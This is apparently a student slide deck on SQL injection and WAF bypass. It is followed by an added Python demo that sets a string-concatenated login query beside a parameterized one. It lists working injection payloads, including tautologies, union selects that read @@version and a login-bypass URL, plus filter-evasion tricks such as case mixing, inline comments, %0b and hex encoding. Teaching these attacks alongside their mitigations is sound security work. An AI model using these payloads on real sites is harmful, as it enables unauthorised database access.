All Ab0ut 0f SQL Injection and WAF Bypass Techniques
All Ab0ut 0f SQL Injection
and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection ?
SQL injection is a code injection attack.
It happens when a user injects SQL commands to change the query's conditions,
because the developer did not filter input from the user.
Logical Conjunction and Disjunction table
SQL Operator
And , &&
Or , ||
Like
*
(,)
<,>
+, - , *, /, %
SQL Comment
end of the line
"#"
"--"
"-- "
multiple line
/* */
Examples
vulnerability and inject command
sql command :
SELECT first_name, last_name FROM users WHERE user_id = '$id'
Inject code :
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'
SELECT first_name, last_name FROM users WHERE user_id = 'am' or 'am'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or '1'='1'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or '2600'='2600'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or 'HELLO' or 'HELLO'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or 1 #'
SELECT first_name, last_name FROM users WHERE user_id = ' ' or true #'
sql command :
SELECT first_name, last_name FROM users WHERE user_id = $id
Inject code :
true
'1' or '1'
2 or 2
sql command :
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Inject code :
1) or (1
2+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมทีโ่ หลดๆมา/Login_thaicreate/PHP MySQL กับ Login Form ทาระบบ User ล็อกอิ น แบบง่าย ๆ ด้วย PHP และ MySQL โดยทาการตรวจสอบ Username และ Password.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";
$result = mysql_query($sql, $db);
if ($result === FALSE)
    die('Invalid SQL query');
if (mysql_num_rows($result) == 1) {
    echo "Congrats, WIN!!!\n";
} else {
    echo "The number of rows is not 1\n";
}
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
Impact
Read information from the database
Can gain access to the system
Etc.
Bypass
Web Application Firewall Techniques
What is a Web Application Firewall?
A Web Application Firewall (WAF)
is software or hardware
focused on protecting the website.
It filters all data at the application layer
and can detect and block attacks on the website.
How to Bypass?
Original
1' or '1'='1
union all select 1,2,3,4,5 --
union all select 1,2,@@version,4,5 --
Solution
1' oR '1'='1
uNIon AlL sELeCt 1,2,3,4,5 --
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass (cont.)
If the filter blocks or, and
Solve:
Use || instead of or
Use && instead of and
How to Bypass (cont.)
If the filter blocks where
Solve:
Use limit instead of where
If the filter blocks limit
Solve:
Use group by and having instead of where
How to Bypass (cont.)
If the filter blocks whitespace
Solve:
Use %0b instead of whitespace
If the filter blocks '
Solve:
Use 0xXX or unhex(xx) instead of '
How to Mitigate
Top 5 Secure Coding Tips for PHP applications
Filter Input Data
GET , POST , COOKIE
Securing Database Queries
Filter Output Data
htmlspecialchars()
htmlentities()
strip_tags()
strtr()
Error Handling
log_errors = On
display_errors = Off
Preventing other injection attacks
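As an added example (not from the slides), the page's PHP login query is shown beside the "Securing Database Queries" fix, a parameterized query, in Python with a constructed in-memory SQLite table standing in for the MySQL `members` table. Because SQLite ends a comment with `--` rather than MySQL's `#`, the page's `' or 1=1 LIMIT 1#` payload is written here with `--`.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the page's `members` table (two sample users)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    rows = [("alice", hashlib.md5(b"alice-pass").hexdigest()),  # md5 as on the page
            ("bob", hashlib.md5(b"bob-pass").hexdigest())]
    db.executemany("INSERT INTO members VALUES (?, ?)", rows)
    return db


def login_vulnerable(db, username, password):
    """Mirrors the page's PHP: user input is concatenated into the SQL text."""
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT * FROM members WHERE password='" + digest +
           "' AND username='" + username + "'")
    rows = db.execute(sql).fetchall()
    return len(rows) == 1  # the page's check: exactly one row means "WIN"


def login_parameterized(db, username, password):
    """Hardened form: placeholders, so the driver sends input as data, never as SQL."""
    digest = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT * FROM members WHERE password=? AND username=?"
    rows = db.execute(sql, (digest, username)).fetchall()
    return len(rows) == 1


# The page's username payload, in SQLite comment form (MySQL form ends with #).
PAYLOAD = "' or 1=1 LIMIT 1--"

if __name__ == "__main__":
    db = make_db()
    # Concatenation: the closing quote, OR 1=1 and LIMIT 1 become part of the query,
    # so one row comes back and the check passes without a valid password.
    print(login_vulnerable(db, PAYLOAD, "whatever"))      # True
    # Parameterized: the same text is compared as a literal username; no row matches.
    print(login_parameterized(db, PAYLOAD, "whatever"))   # False
    print(login_parameterized(db, "alice", "alice-pass"))  # True
```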
References and Appendix
www.owasp.org
http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/
http://dev.mysql.com/doc/refman/5.0/en/non-typedoperators.html
http://thtutz.blogspot.com